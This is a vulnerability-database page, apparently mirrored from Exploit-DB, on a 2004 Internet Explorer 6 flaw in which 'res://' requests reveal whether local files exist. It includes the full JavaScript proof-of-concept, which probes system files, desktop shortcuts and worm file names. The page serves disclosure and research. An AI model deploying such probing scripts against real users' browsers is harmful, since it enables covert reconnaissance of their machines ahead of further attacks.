Microsoft Internet Explorer 6 - Local Resource Enumeration

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1054741 漏洞类型
发布时间 2004-11-08 更新时间 2004-11-08
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/24727
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/11621/info


Microsoft Internet Explorer is reported prone to a local resource enumeration vulnerability. It is reported that the vulnerability exists because when handling 'res://' requests for local resources, Internet explorer behavior may reveal the existence of local files.

An attacker may employ information that is harvested in this manner to aid in further attacks that are launched against a target computer.


<textarea id="btft" rows="10" cols="75"></textarea><br>
<input type="text" id="btfn" value="iexplore.exe">
<input type="button" value="> Search >"
onClick="alert('File '+btfc(document.all.btfn.value));">

<script>

// Copyright (C) 2004 by Benjamin Tobias Franz (0-1-2-3@gmx.de)
//
// Search for files with known names in following directories:
// Root (C:/), WINDOWS, SYSTEM, SYSTEM32, DESKTOP, COMMAND,
// Internet Explorer

function btfc(btfp){
var btfe=0,btfp;
try{window.open("res://"+btfp,"_search");}
catch(e){btfe=1;}
if(btfe==1)return "'"+btfp+"' exists!\n";
else return "'"+btfp+"' does NOT exist!\n";}

var btfd="",btfv="BTF-AntiVirus: Search for '";
btfd+="Search for system files ...\n";
btfd+=btfc("autoexec.bat");
btfd+=btfc("msdos.sys");
btfd+=btfc("twain.dll");
btfd+=btfc("swflash.ocx");
btfd+=btfc("shell32.dll");
btfd+=btfc("test.txt");
btfd+=btfc("test.btf");
btfd+="\nSearch for shortcut files (on desktop) ...\n";
btfd+=btfc("Microsoft Word.lnk");
btfd+=btfc("IrfanView.lnk");
btfd+=btfc("Opera.lnk");
btfd+=btfc("Mozilla.lnk");
btfd+=btfc("Netscape 6.lnk");
btfd+=btfc("Netscape 7.lnk");
btfd+=btfc("btf.lnk");
btfd+="\nSearch for virus/worm files ...\n";
btfd+=btfv+"Badtrans' : "+btfc("kernel32.exe");
btfd+=btfv+"MTX' : "+btfc("wsock32.mtx");
btfd+=btfv+"MyLife.j' : "+btfc("usa.scr");
btfd+=btfv+"MyLife.f' : "+btfc("list480.txt.scr");
btfd+=btfv+"MyLife.c' : "+btfc("list.txt.scr");
btfd+=btfv+"MyLife.b' : "+btfc("cari.scr");
btfd+=btfv+"MyLife.a' : "+btfc("my life.scr");
btfd+=btfv+"Gibe' : "+btfc("bctool.exe ");
btfd+=btfv+"Klez' : "+btfc("wqk.exe");
btfd+=btfv+"MyParty' : "+btfc("regctrl.exe");
btfd+=btfv+"Maldal' : "+btfc("win.exe");
btfd+=btfv+"Gokar' : "+btfc("karen.exe");

// ...

document.all.btft.value=
"Copyright (C) 2004 by Benjamin Tobias Franz (0-1-2-3@gmx.de)\n\n"+
btfd;
</script>